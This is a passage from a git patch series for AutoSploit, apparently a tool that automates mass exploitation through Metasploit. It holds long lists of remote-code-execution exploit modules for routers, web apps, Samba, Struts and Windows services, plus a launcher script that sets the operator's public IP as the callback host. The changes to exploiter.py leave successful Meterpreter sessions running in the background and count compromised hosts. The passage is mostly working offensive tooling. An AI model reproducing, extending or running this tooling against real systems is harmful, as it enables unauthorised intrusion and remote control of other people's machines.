"exploit/linux/http/nagios_xi_chained_rce", - "exploit/linux/http/netgear_dgn1000_setup_unauth_exec", - "exploit/linux/http/netgear_wnr2000_rce ", - "exploit/linux/http/nuuo_nvrmini_auth_rce", - "exploit/linux/http/nuuo_nvrmini_unauth_rce", - "exploit/linux/http/op5_config_exec", - "exploit/linux/http/pandora_fms_exec", - "exploit/linux/http/pineapple_preconfig_cmdinject", - "exploit/linux/http/seagate_nas_php_exec_noauth", - "exploit/linux/http/symantec_messaging_gateway_exec", - "exploit/linux/http/trendmicro_imsva_widget_exec", - "exploit/linux/http/trueonline_billion_5200w_rce", - "exploit/linux/http/trueonline_p660hn_v1_rce", - "exploit/linux/http/trueonline_p660hn_v2_rce", - "exploit/linux/http/vcms_upload", - "exploit/linux/misc/lprng_format_string", - "exploit/linux/misc/mongod_native_helper", - "exploit/linux/misc/ueb9_bpserverd", - "exploit/linux/mysql/mysql_yassl_getname", - "exploit/linux/pop3/cyrus_pop3d_popsubfolders", - "exploit/linux/postgres/postgres_payload", - "exploit/linux/pptp/poptop_negative_read", - "exploit/linux/proxy/squid_ntlm_authenticate", - "exploit/linux/samba/lsa_transnames_heap", - "exploit/linux/samba/setinfopolicy_heap", - "exploit/linux/samba/trans2open", - "exploit/multi/elasticsearch/script_mvel_rce", - "exploit/multi/elasticsearch/search_groovy_script", - "exploit/multi/http/atutor_sqli", - "exploit/multi/http/axis2_deployer", - "exploit/multi/http/familycms_less_exe", - "exploit/multi/http/freenas_exec_raw", - "exploit/multi/http/gestioip_exec", - "exploit/multi/http/glassfish_deployer", - "exploit/multi/http/glpi_install_rce", - "exploit/multi/http/joomla_http_header_rce ", - "exploit/multi/http/makoserver_cmd_exec", - "exploit/multi/http/novell_servicedesk_rc", - "exploit/multi/http/oracle_reports_rce", - "exploit/multi/http/php_utility_belt_rce", - "exploit/multi/http/phpfilemanager_rce", - "exploit/multi/http/phpmyadmin_3522_backdoor", - "exploit/multi/http/phpwiki_ploticus_exec", - "exploit/multi/http/processmaker_exec", - "exploit/multi/http/rails_actionpack_inline_exec", - "exploit/multi/http/rails_dynamic_render_code_exec", - "exploit/multi/http/rails_secret_deserialization", - "exploit/multi/http/rocket_servergraph_file_requestor_rce", - "exploit/multi/http/simple_backdoors_exec", - "exploit/multi/http/spree_search_exec", - "exploit/multi/http/spree_searchlogic_exec", - "exploit/multi/http/struts2_rest_xstream", - "exploit/multi/http/struts_code_exec", - "exploit/multi/http/struts_code_exec_classloader", - "exploit/multi/http/struts_code_exec_parameters", - "exploit/multi/http/struts_dev_mode", - "exploit/multi/http/sysaid_auth_file_upload", - "exploit/multi/http/tomcat_jsp_upload_bypass", - "exploit/multi/http/vtiger_install_rce", - "exploit/multi/http/werkzeug_debug_rce", - "exploit/multi/http/zemra_panel_rce", - "exploit/multi/http/zpanel_information_disclosure_rce", - "exploit/multi/ids/snort_dce_rpc", - "exploit/multi/misc/batik_svg_java", - "exploit/multi/misc/pbot_exec", - "exploit/multi/misc/veritas_netbackup_cmdexec", - "exploit/multi/mysql/mysql_udf_payload", - "exploit/multi/php/php_unserialize_zval_cookie", - "exploit/unix/http/freepbx_callmenum", - "exploit/unix/http/lifesize_room", - "exploit/unix/http/pfsense_clickjacking", - "exploit/unix/http/pfsense_group_member_exec", - "exploit/unix/http/tnftp_savefile", - "exploit/unix/misc/polycom_hdx_traceroute_exec", - "exploit/unix/webapp/awstats_migrate_exec", - "exploit/unix/webapp/carberp_backdoor_exec", - "exploit/unix/webapp/citrix_access_gateway_exec", - "exploit/unix/webapp/dogfood_spell_exec", - "exploit/unix/webapp/invision_pboard_unserialize_exec", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce", - "exploit/unix/webapp/mybb_backdoor", - "exploit/unix/webapp/opensis_modname_exec", - "exploit/unix/webapp/oscommerce_filemanager", - "exploit/unix/webapp/piwik_superuser_plugin_upload", - "exploit/unix/webapp/tikiwiki_upload_exec", - "exploit/unix/webapp/webtester_exec", - "exploit/unix/webapp/wp_phpmailer_host_header", - "exploit/unix/webapp/wp_total_cache_exec", - "exploit/windows/antivirus/symantec_endpoint_manager_rce", - "exploit/windows/http/ektron_xslt_exec", - "exploit/windows/http/ektron_xslt_exec_ws", - "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", - "exploit/windows/http/hp_autopass_license_traversal", - "exploit/windows/http/manage_engine_opmanager_rce", - "exploit/windows/http/netgear_nms_rce", - "exploit/windows/http/sepm_auth_bypass_rce", - "exploit/windows/http/trendmicro_officescan_widget_exec", - "exploit/windows/iis/iis_webdav_upload_asp", - "exploit/windows/iis/msadc", - "exploit/windows/misc/manageengine_eventlog_analyzer_rce", - "exploit/windows/novell/file_reporter_fsfui_upload", - "exploit/windows/scada/ge_proficy_cimplicity_gefebt", - "exploit/windows/smb/ipass_pipe_exec", - "exploit/windows/smb/smb_relay", - "auxiliary/sqli/oracle/jvm_os_code_10g", - "auxiliary/sqli/oracle/jvm_os_code_11g" - ] -} diff --git a/run_autosploit.sh b/run_autosploit.sh index 98ae47d..46ef6e8 100644 --- a/run_autosploit.sh +++ b/run_autosploit.sh @@ -12,4 +12,5 @@ LPORT=$2 LHOST=`dig +short @resolver1.opendns.com myip.opendns.com` TIMESTAMP=`date +%s` -python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/other_modules.json +python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" +$LHOST $LPORT -f etc/json/default_modules.json From 6e01b923b983191f1a4dae76645a33da7c17fed1 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 13:12:19 -0400 Subject: [PATCH 5/9] Fixed bash script args (2) --- dryrun_autosploit.sh | 1 + run_autosploit.sh | 1 + 2 files changed, 2 insertions(+) diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh index 137d5a2..28f126a 100644 --- a/dryrun_autosploit.sh +++ b/dryrun_autosploit.sh @@ -4,6 +4,7 @@ if [[ $# -lt 2 ]]; then echo "Syntax:" echo -e "\t./dryrun_autosploit.sh " + exit 1 fi WHITELIST=$1 diff --git a/run_autosploit.sh b/run_autosploit.sh index 46ef6e8..aae1209 100644 --- a/run_autosploit.sh +++ b/run_autosploit.sh @@ -4,6 +4,7 @@ if [[ $# -lt 2 ]]; then echo "Syntax:" echo -e "\t./run_autosploit.sh " + exit 1 fi WHITELIST=$1 From 1790c151901f3e38ed1644a639c68fe6cf348d6b Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 13:12:19 -0400 Subject: [PATCH 6/9] Fixed bash script args (2) --- dryrun_autosploit.sh | 1 + run_autosploit.sh | 4 ++-- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh index 137d5a2..28f126a 100644 --- a/dryrun_autosploit.sh +++ b/dryrun_autosploit.sh @@ -4,6 +4,7 @@ if [[ $# -lt 2 ]]; then echo "Syntax:" echo -e "\t./dryrun_autosploit.sh " + exit 1 fi WHITELIST=$1 diff --git a/run_autosploit.sh b/run_autosploit.sh index 46ef6e8..b573908 100644 --- a/run_autosploit.sh +++ b/run_autosploit.sh @@ -4,6 +4,7 @@ if [[ $# -lt 2 ]]; then echo "Syntax:" echo -e "\t./run_autosploit.sh " + exit 1 fi WHITELIST=$1 @@ -12,5 +13,4 @@ LPORT=$2 LHOST=`dig +short @resolver1.opendns.com myip.opendns.com` TIMESTAMP=`date +%s` -python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" -$LHOST $LPORT -f etc/json/default_modules.json +python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/default_modules.json From 46b3e899a1e29c04ad1955d70ed5edb4ee693892 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 16:36:24 -0400 Subject: [PATCH 7/9] Bugfix and improvements: Successful exploits will start meterpreter in background. Counter for successful exploits/failed exploits bug, couting output lines, not success/failure occurence --- etc/json/default_modules.json | 2 -- lib/exploitation/exploiter.py | 13 +++++++++---- 2 files changed, 9 insertions(+), 6 deletions(-) diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json index f0e5a65..e59d795 100644 --- a/etc/json/default_modules.json +++ b/etc/json/default_modules.json @@ -146,7 +146,6 @@ "auxiliary/admin/cisco/vpn_3000_ftp_bypass", "exploit/bsdi/softcart/mercantec_softcart ", "exploit/freebsd/misc/citrix_netscaler_soap_bof", - "exploit/freebsd/samba/trans2open", "exploit/linux/ftp/proftp_sreplace ", "exploit/linux/http/dcos_marathon", "exploit/linux/http/f5_icall_cmd", @@ -183,7 +182,6 @@ "exploit/linux/proxy/squid_ntlm_authenticate", "exploit/linux/samba/lsa_transnames_heap", "exploit/linux/samba/setinfopolicy_heap", - "exploit/linux/samba/trans2open", "exploit/multi/elasticsearch/script_mvel_rce", "exploit/multi/elasticsearch/search_groovy_script", "exploit/multi/http/atutor_sqli", diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index 97e3e6e..cc61101 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py @@ -121,7 +121,7 @@ def start_exploit(self): "setg threads 20\n" "set rhost {rhost}\n" "set rhosts {rhosts}\n" - "run\n" + "run -z\n" "exit\n" ) @@ -157,11 +157,16 @@ def start_exploit(self): ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]') msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)]) - msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x)]) + msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x) or + 'Meterpreter' in x or + 'Session' in x or + 'Sending stage' in x]) msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)]) - win_total += len(msf_wins) - fail_total += len(msf_fails) + if len(msf_wins): + win_total += 1 + if len(msf_fails): + fail_total += 1 csv_file = csv.writer(f, quoting=csv.QUOTE_ALL) csv_file.writerow([rhost, From 14153aa7e4286817023edb43eebc5d4abdb0979b Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 16:40:40 -0400 Subject: [PATCH 8/9] Added a fuzzers-only json file --- etc/json/fuzzers.json | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 etc/json/fuzzers.json diff --git a/etc/json/fuzzers.json b/etc/json/fuzzers.json new file mode 100644 index 0000000..b606973 --- /dev/null +++ b/etc/json/fuzzers.json @@ -0,0 +1,25 @@ +{ + "exploits": [ + "auxiliary/fuzzers/dns/dns_fuzzer", + "auxiliary/fuzzers/ftp/client_ftp", + "auxiliary/fuzzers/ftp/ftp_pre_post", + "auxiliary/fuzzers/http/http_form_field", + "auxiliary/fuzzers/http/http_get_uri_long", + "auxiliary/fuzzers/http/http_get_uri_strings", + "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", + "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", + "auxiliary/fuzzers/smb/smb_create_pipe", + "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", + "auxiliary/fuzzers/smb/smb_negotiate_corrupt ", + "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", + "auxiliary/fuzzers/smb/smb_tree_connect", + "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", + "auxiliary/fuzzers/smtp/smtp_fuzzer", + "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", + "auxiliary/fuzzers/ssh/ssh_version_15", + "auxiliary/fuzzers/ssh/ssh_version_2", + "auxiliary/fuzzers/ssh/ssh_version_corrupt", + "auxiliary/fuzzers/tds/tds_login_corrupt", + "auxiliary/fuzzers/tds/tds_login_username" + ] +} From 5d47234b32cd827c9613c827dae54f276d920c06 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 16:46:17 -0400 Subject: [PATCH 9/9] More bugfixes: Exploiter now grepping escaped MSF output for success/failures. ANSI escape sequences are now properly ignored --- lib/exploitation/exploiter.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index cc61101..55f94bb 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py @@ -157,11 +157,13 @@ def start_exploit(self): ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]') msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)]) - msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x) or + + msf_wins = linesep.join([ansi_escape.sub('', x) for x in msf_output_lines if re.search('\[\+\]', x) or 'Meterpreter' in x or 'Session' in x or 'Sending stage' in x]) - msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)]) + + msf_fails = linesep.join([ansi_escape.sub('', x) for x in msf_output_lines if re.search('\[-\]', x)]) if len(msf_wins): win_total += 1